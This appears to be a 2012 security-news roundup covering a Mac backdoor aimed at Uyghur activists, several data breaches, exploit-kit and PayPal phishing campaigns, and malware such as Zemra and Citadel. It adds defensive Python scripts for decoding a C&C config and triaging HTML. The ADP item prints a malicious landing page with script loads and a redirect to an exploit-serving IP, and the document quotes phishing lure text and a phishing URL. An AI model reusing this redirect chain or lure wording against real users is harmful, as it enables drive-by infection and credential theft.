Mac and Windows Malware Campaign Targets Uyghur Activists


Researchers at Kaspersky Lab intercepted a Mac-based Trojan attack targeting Uyghur human rights activists.

According to Costin Raiu, Director of Kaspersky's Global Research and Analysis Team, the campaign uses malicious e-mails containing a JPEG photo and a Mac OS X app embedded in a ZIP file.

When the recipient opens the ZIP file, the malware installs itself on the Mac OS X system and then attempts to connect to a command and control (C&C) server, allowing the attacker to run commands on the infected computer and access its files.

"The application is actually a new, mostly undetected version of the MaControl backdoor (Universal Binary), which supports both i386 and PowerPC Macs. We detect it as 'Backdoor.OSX.MaControl.b'," Raiu noted in a blog post.

"The backdoor is quite flexible – its Command and Control servers are stored in a configuration block which has been appended at the end of the file, 0x214 bytes in size. The configuration block is obfuscated with a simple 'subtract 8' operation," he added.

Researchers appear to have traced the C&C server to an IP address in China.
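
As an added illustration (not code from Kaspersky or from the original post), the following Python script shows how a defender could pull the C&C list out of a sample's trailing configuration block using only the two facts quoted above: the block is the last 0x214 bytes of the file, and it is obfuscated byte-wise with a "subtract 8". Undoing that by adding 8 back modulo 256 is an assumption about the direction; the sample file, the hostnames ending in .invalid and the "MaControl v1" tag are constructed for the demonstration, not values from a real sample.

```python
import re

# Size of the configuration block Kaspersky reports appended to the MaControl binary.
CONFIG_BLOCK_SIZE = 0x214


def deobfuscate(block: bytes, delta: int = 8) -> bytes:
    """Reverse the 'subtract 8' obfuscation byte-wise.

    Assumption: the packer subtracted 8 from each byte (mod 256), so adding 8
    back recovers the plaintext. If a real sample decodes to garbage, the
    opposite direction (delta=-8) is the first thing to try.
    """
    return bytes((b + delta) & 0xFF for b in block)


def extract_config_block(data: bytes, size: int = CONFIG_BLOCK_SIZE) -> bytes:
    """Slice the trailing config block off the file image.

    The block is simply appended after the Mach-O content, so no Mach-O
    parsing is needed: the last `size` bytes of the file are the block.
    """
    if len(data) < size:
        raise ValueError("file smaller than the expected config block")
    return data[-size:]


_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# host[:port] or IPv4[:port]; good enough to separate C&C entries from other strings
_HOST = re.compile(
    r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d{1,5})?$|^(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?$",
    re.I,
)


def printable_strings(buf: bytes):
    """ASCII runs of 4+ characters, the usual first pass over a decoded config."""
    return [m.group().decode("ascii") for m in _PRINTABLE.finditer(buf)]


def extract_c2_candidates(data: bytes):
    """Decode the trailing block and keep only strings that look like host[:port] entries."""
    block = deobfuscate(extract_config_block(data))
    return [s for s in printable_strings(block) if _HOST.match(s)]


# ---- constructed sample (not a real MaControl file) ----
def build_sample() -> bytes:
    body = b"\xca\xfe\xba\xbe" + b"\x00" * 64          # fat-binary magic plus padding as a stand-in
    config = b"MaControl v1\x00c2.example.invalid\x00backup.example.invalid:8080\x00"
    config = config.ljust(CONFIG_BLOCK_SIZE, b"\x00")  # pad to the 0x214-byte block size
    obfuscated = bytes((b - 8) & 0xFF for b in config)  # apply the 'subtract 8' the way the packer would
    return body + obfuscated


if __name__ == "__main__":
    for c2 in extract_c2_candidates(build_sample()):
        print(c2)
```

On a real file the same two calls apply to the bytes read from disk; the hostname filter is deliberately loose so that an entry with an unusual TLD or a bare IP still surfaces for the analyst to judge.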

Similar to Kaspersky Lab's discovery, AlienVault Labs claims to have found another backdoor that targets Windows users.

Transmitted through email, the attack also includes a ZIP file along with a WinRAR file. The file extracts a binary that goes on to copy itself, but not before dropping a DLL file on the system. After it is injected, the DLL file appears to help initiate Gh0st RAT, a well-known remote access tool. Gh0st RAT was served up by Amnesty International's website just last month and has been used in other targeted attack campaigns in recent years.

Stolen Laptop Puts 30,000 Texas Cancer Center Patients at Risk of identity theft

A laptop stolen from an employee at a Houston, Texas, cancer hospital has put as many as 30,000 patients at risk of identity theft.


The University of Texas MD Anderson Cancer Center issued a security advisory explaining that on April 30, an unencrypted laptop was stolen from an MD Anderson faculty member's home.

The faculty member notified the local police department. MD Anderson was alerted to the theft on May 1, and immediately began a thorough investigation to determine what information was contained on the laptop.

"We have confirmed that the laptop may have contained some of our patients' personal information, including patients' names, medical record numbers, treatment and/or research information, and in some instances Social Security numbers," MD Anderson said.

MD Anderson is the second major cancer center in the U.S. to fall victim to a recent security breach; last week, Memorial Sloan-Kettering Cancer Center in New York began notifying patients that their medical records and Social Security numbers may have been compromised. In the past year, several hospitals and colleges, including Yale and Columbia University, have been hit by data breaches that put large populations of people at risk.

According to the Houston Business Journal, Social Security numbers for about one-third of the hospital's patients (about 10,000) were stored on the stolen MD Anderson laptop. The cancer treatment hospital said it has "no reason to believe" that the computer, which is still missing, "was stolen for the information that it contained." MD Anderson said police have launched a criminal investigation and are working to locate the laptop.

Trendmicro & Sykes Hacked by @OfficialComrade

The website of TrendMicro, one of the popular antivirus vendors, has been hacked by @OfficialComrade (.c0mrade), who dumped a large batch of emails.

Sykes, through which TrendMicro appears to run its support services, was affected as well. The attack was announced on .c0mrade's Twitter account with the following message.

"Trendmicro & Sykes is a Global Business and Antivirus suite, we've targeted them due to their constant lash of pseudo-security," the hacker said in the Pastebin post.

"Owning Trendmicro & Sykes wasn't a priority of ours. However, if it was, they would have dug their burial site sometime ago."

"Sliding towards more recent events, today is June 30th, 2012 and absurdly, I'm monotonous. Why? Because Nowadays, it seems as if everybody is widely concerned with notoriety. New 'groups' are emerging, more 'pigments' are being infiltrated by demented teenagers so they could feel better about themselves, etc. My demands are written on the palm of my hands; stop. You're a nuisance. Sliding back to the whole Trendmicro & Sykes testament, we don't want to be complete pricks, so for the companies' sake, we'll take baby steps on this one. We'll release every inch of their Email Database; Inbox, Drafts, Sent Items, Deleted Items, Attachments, and all content in all folders. You'll need a .dbx file viewer to see the content."

http://pastebin.com/EVSAXjz1

Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits


Researchers at MX Lab have intercepted emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious website with obfuscated JavaScript code.


The email is sent from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The URL does not lead to the site mentioned in the message but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html, where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>
</html>

Both embedded JavaScript files redirect the browser with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24'; that page contains obfuscated JavaScript.

After de-obfuscating the JavaScript, I found a Blackhole exploit pack that tries to exploit vulnerable software (Flash, PDF readers and others). At the bottom of the page is the applet code that tries to exploit the Java Atomic reference vulnerability.
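
As an added triage example (not code from MX Lab or from the original post), this Python script parses an HTML snippet and reports the three signals the post describes: script tags loaded from a host other than the page's own, document.location redirects inside JavaScript, and links whose visible text shows one URL while the href points somewhere else. The landing page, the redirect line and the two URLs in the mismatched link are the ones quoted in the post, kept in defanged hxxp form (the script maps hxxp to http only so the hostname can be parsed); wrapping them into a mail body and a js.js snippet is my construction.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect external script sources, inline script bodies and anchor href/text pairs."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.inline_js = []
        self.links = []            # (href, visible text)
        self._in_script = False
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)
        elif self._href is not None:
            self._text.append(data)


# document.location = '...' / window.location.href = "..." style redirects
_REDIRECT = re.compile(r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


def host_of(url: str) -> str:
    """Hostname of a URL; defanged hxxp(s):// is mapped to http(s):// so urlparse accepts it."""
    if url.lower().startswith("hxxp"):
        url = "http" + url[4:]
    return (urlparse(url).hostname or "").lower()


def find_redirects(js: str):
    """Return every location-assignment target found in a JavaScript body."""
    return _REDIRECT.findall(js)


def triage(html: str, page_url: str = ""):
    """Return (signal, detail) findings for an HTML page or mail body."""
    p = _Collector()
    p.feed(html)
    page_host = host_of(page_url)
    findings = []
    for src in p.script_srcs:                       # scripts pulled from a foreign host
        if host_of(src) and host_of(src) != page_host:
            findings.append(("external_script", src))
    for js in p.inline_js:                          # inline redirect to yet another host
        for target in find_redirects(js):
            findings.append(("js_redirect", target))
    for href, text in p.links:                      # link text shows one URL, href another
        if text.lower().startswith(("http", "hxxp")) and host_of(text) != host_of(href):
            findings.append(("link_text_mismatch", f"{text} -> {href}"))
    return findings


# Landing page quoted in the post (defanged), used here as the constructed sample input.
LANDING_PAGE = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>
</html>"""
LANDING_URL = "hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html"

# Body of the redirecting js.js as the post describes it (constructed wrapper around the quoted line).
JS_SNIPPET = "document.location='hxxp://173.255.228.171/getfile.php?u=853fda24';"

# Constructed mail body: the visible text is the genuine ADP URL, the href is the landing page.
MAIL_BODY = ('<p>Your Transaction Report(s) have been uploaded to the web site: '
             '<a href="' + LANDING_URL + '">https://www.flexdirect.adp.com/client/login.aspx</a></p>')

if __name__ == "__main__":
    for signal, detail in triage(MAIL_BODY) + triage(LANDING_PAGE, LANDING_URL):
        print(signal, detail)
    for target in find_redirects(JS_SNIPPET):
        print("js_redirect", target)
```

The checks are cheap string comparisons, so the same function can be run over a mailbox export or a proxy capture; a script whose src points back to the page's own host is deliberately ignored to keep the noise down.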

Zemra, a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec Researchers. This threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that it has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and acts as the gateway for recording the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client, and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.

New version of Citadel Trojan prevents Virtual Machine Analysis


Security researchers from S21sec have spotted two major changes in the latest version of the Citadel Trojan. The two changes, an 'anti-emulator' and an 'encryption change', try to make malware analysts' lives harder.

The anti-emulator: when it starts, a built-in detector checks whether it is running in a virtual machine or a sandboxed environment (CWSandbox, VMware, VirtualBox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technology is very tricky.

According to the researchers, it simply scans through the resources of the currently running processes and looks for specific patterns, for instance inside the "CompanyName" field, such as 'vmware', 'sandbox', 'virtualbox' and 'geswall'.

While running in a VM, the Trojan creates a fake domain name and attempts to connect to it. This strategy is meant to fool researchers into believing that the command and control (C&C) server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 implementation is slightly different compared to previous versions, with an internal hash added to the algorithm.

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University's website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.

‘Confirm PayPal account' notifications lead to phishing sites


Extremely legitimate-looking PayPal-themed emails have been hitting inboxes in the last few days, trying to trick users into entering their account data on the fraudulent website linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," the fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes those users to a faithfully reproduced PayPal phishing site.

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.

Panda Security site Hacked and database compromised by @LulzSecMx


A hacker known as @LulzSecMx claimed to have gained unauthorized access to the website of Panda Security, one of the biggest anti-virus providers, and leaked its database on Pastebin. The attack was announced via @LulzSecMx.

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" the hacker said.

"We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email addresses, encrypted passwords and some other confidential data compromised from the PandaSecurity.com website.

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, the finance ministry's website was hacked, with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.

Hook Analyser 2.0 released - reversing applications and analysing malware

Hook Analyser is a hooking tool that can be helpful in reversing applications and analysing malware.

Changelog:

  • Static analysis functionality has got improved significantly.
  • Nice fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have improved.
  • No more annoying browser pop-ups (previous releases had some).

Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip